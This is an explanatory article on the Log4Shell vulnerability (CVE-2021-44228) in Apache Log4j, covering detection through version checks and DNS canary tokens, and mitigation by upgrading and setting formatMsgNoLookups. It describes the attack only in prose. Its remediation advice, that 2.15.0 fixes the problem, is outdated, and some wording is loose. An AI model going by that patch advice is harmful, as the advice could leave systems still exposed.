What is Log4Shell
It is a vulnerability that affects the popular Java registry library Log4j, developed by Apache. It is widely used in all kinds of services and software. For example in games like Minecraft, in addition to cloud services. It is used for applications to store a record or log during their operation.
We can say that this problem affects million servers Worldwide. All of them are vulnerable and can be attacked remotely. By exploiting the Log4Shell flaw, an attacker could sneak malware in and take full control of that server. Basically he would have a free hand to do whatever he wanted.
The vulnerability has been registered as CVE-2021-44228 and a CVSS score of 10. The attacker, in order to exploit it, simply needs the application to register a special string, a series of characters. Computer security researcher Matthew Prince, in his profile of Twitter, reports evidence that the exploit was available at least 9 days before its publication, although there is no evidence that it has been widely used until then.
However, now there are many attackers who are exploiting the Log4Shell vulnerability and being able to carry out their attacks. They can, for example, install cryptocurrency miners on a server or turn affected devices into a botnet.
How to detect this vulnerability
Java is estimated to be present on some 3 billion devices worldwide. The vast majority of programmers use Log4j, so there are many who can be vulnerable to this problem. Is it possible to know if a system is vulnerable to Log4Shell? There are several ways to do it and one of the simplest is know the version of Log4j that you have installed. The vulnerable ones range from 2.0-beta9 to 2.14.1.
In addition, on GitHub we can find the steps to execute commands and detect if the vulnerability registered as CVE-2021-44228 is present or not. This Python-based scanner acts as vulnerability detector Log4Shell.
We can say that the simplest way to detect if a remote endpoint is vulnerable is trigger a DNS query. What the exploit does is that the hypothetical vulnerable server tries to obtain remote code. By using the address of a free DNS registration tool in the exploit chain, we can detect when the vulnerability is triggered. As they explain in Lunasec, we can use CanaryTokens for it.
How to fix it on your system
If you know that your system is vulnerable and you want to protect it, there are different ways. The most recommended right now is update version from Log4j to 2.15.0, which fixes the problem. You can download it from the official Apache website. It is very important to always have the latest versions and this is a clear example of this.
You can also consult the official Log4j security announcement, where you will find all the information on the steps to correct the vulnerability and install the necessary patches.
However, due to the enormous importance of this security flaw, different options have arisen that acted as “momentary patches” and thus be able to correct or at least reduce the problem. An example is the script launched by Cybereason, which relies on the vulnerability itself to disable a configuration on a remote, vulnerable instance of Log4Shell.
Also, another temporary mitigation until there was a patch was to set the log4j2.formatMsgNoLookups parameter; to True when starting the Java virtual machine.
Ultimately, the Log4Shell vulnerability is very dangerous and has put millions of devices around the world at risk. It is essential to correct the problem as soon as possible and there is nothing better than updating to the latest version.